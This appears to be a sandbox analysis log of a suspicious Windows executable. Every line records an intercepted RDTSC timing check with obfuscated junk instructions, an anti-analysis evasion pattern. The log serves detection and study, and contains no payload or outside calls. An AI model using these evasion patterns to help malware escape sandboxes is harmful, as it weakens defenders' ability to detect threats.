Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF733 second address: FDF742 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD714BB3916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF742 second address: FDF75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jl 00007FD714BB074Ch 0x0000000f je 00007FD714BB0746h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF9EE second address: FDFA19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e jo 00007FD714BB391Ch 0x00000014 jc 00007FD714BB3916h 0x0000001a popad 0x0000001b jp 00007FD714BB3924h 0x00000021 jbe 00007FD714BB391Eh 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDFB76 second address: FDFB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDFB7A second address: FDFB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDFCFC second address: FDFD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD714BB0751h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDFD18 second address: FDFD2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007FD714BB3916h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDFD2D second address: FDFD34 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDFE98 second address: FDFEC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007FD714BB391Eh 0x00000013 push eax 0x00000014 pop eax 0x00000015 jnc 00007FD714BB3916h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 jp 00007FD714BB3916h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE002E second address: FE0034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE01A0 second address: FE01D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FD714BB391Bh 0x0000000a je 00007FD714BB3916h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD714BB3921h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE01D0 second address: FE01D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE01D6 second address: FE01E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD714BB3916h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE039A second address: FE03B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FD714BB0746h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e jo 00007FD714BB0746h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF155 second address: FDF15C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE9F26 second address: FE9F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE9F2C second address: FE9F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE9A7A second address: FE9AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB0758h 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e jmp 00007FD714BB0751h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE9AB2 second address: FE9AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE9AB6 second address: FE9ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FD714BB0746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007FD714BB0746h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE9ACB second address: FE9AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD714BB391Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE9C3E second address: FE9C44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF693C second address: FF6958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3928h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF64F3 second address: FF64F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF64F9 second address: FF6503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF6503 second address: FF6507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF6507 second address: FF6553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3920h 0x00000007 jmp 00007FD714BB391Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007FD714BB3924h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD714BB3925h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD65F second address: FFD66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD714BB0746h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD66C second address: FFD678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FD714BB3916h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD678 second address: FFD67C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD67C second address: FFD699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD714BB3923h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD699 second address: FFD69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD69D second address: FFD6C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jbe 00007FD714BB3916h 0x00000013 jmp 00007FD714BB391Fh 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD810 second address: FFD814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFD814 second address: FFD81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100210C second address: 1002123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD714BB0752h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1013437 second address: 1013441 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD714BB391Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1011EA9 second address: 1011EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1011EAD second address: 1011EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD714BB3918h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1012177 second address: 101217C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10122D1 second address: 10122D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101262D second address: 1012643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Ah 0x00000007 push esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1012643 second address: 101264B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101264B second address: 1012654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1012654 second address: 1012658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101311F second address: 1013123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10163E0 second address: 10163EA instructions: 0x00000000 rdtsc 0x00000002 je 00007FD714BB3922h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10163EA second address: 10163F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10160C4 second address: 10160D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD714BB391Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10160D8 second address: 10160DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023FF7 second address: 1023FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023FFF second address: 1024003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1029EEB second address: 1029EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD714BB3916h 0x0000000a popad 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1020BEB second address: 1020C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD714BB0746h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD714BB0746h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1020C00 second address: 1020C09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1020C09 second address: 1020C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD714BB0746h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1036A61 second address: 1036A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1036A69 second address: 1036A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1036A6D second address: 1036A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD714BB3921h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1036A86 second address: 1036A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10368A5 second address: 10368A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10368A9 second address: 10368D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD714BB0757h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10368D1 second address: 10368D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038A09 second address: 1038A0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1038A0E second address: 1038A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104DEB8 second address: 104DEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CDF2 second address: 104CDF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CDF6 second address: 104CE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD714BB0750h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CF6D second address: 104CF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CF73 second address: 104CF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007FD714BB0752h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104CF8C second address: 104CFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jmp 00007FD714BB3926h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104DA0F second address: 104DA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104DA13 second address: 104DA19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104DBC7 second address: 104DBEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FD714BB074Ah 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push esi 0x0000001a pop esi 0x0000001b je 00007FD714BB0746h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104DBEE second address: 104DBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104F4F4 second address: 104F501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FD714BB0746h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 105208F second address: 10520A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FD714BB3918h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10520A0 second address: 10520B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB0751h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10520B5 second address: 10520ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jp 00007FD714BB3925h 0x00000012 jmp 00007FD714BB391Fh 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD714BB3923h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1053B8D second address: 1053B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0338 second address: 56B033E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B033E second address: 56B0342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0342 second address: 56B0363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD714BB391Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0363 second address: 56B0367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0367 second address: 56B036D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B036D second address: 56B037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB074Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B037C second address: 56B038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B038B second address: 56B038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B038F second address: 56B039D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B039D second address: 56B03E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD714BB0751h 0x00000009 sub esi, 13EF9E26h 0x0000000f jmp 00007FD714BB0751h 0x00000014 popfd 0x00000015 call 00007FD714BB0750h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B03E6 second address: 56B0400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3926h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0475 second address: 56B04AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD714BB0757h 0x00000009 sbb al, FFFFFF8Eh 0x0000000c jmp 00007FD714BB0759h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B04AF second address: 56B04D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD714BB3926h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B04D1 second address: 56B04D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B04D5 second address: 56B04DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D06D3 second address: 56D06D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D06D9 second address: 56D06DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
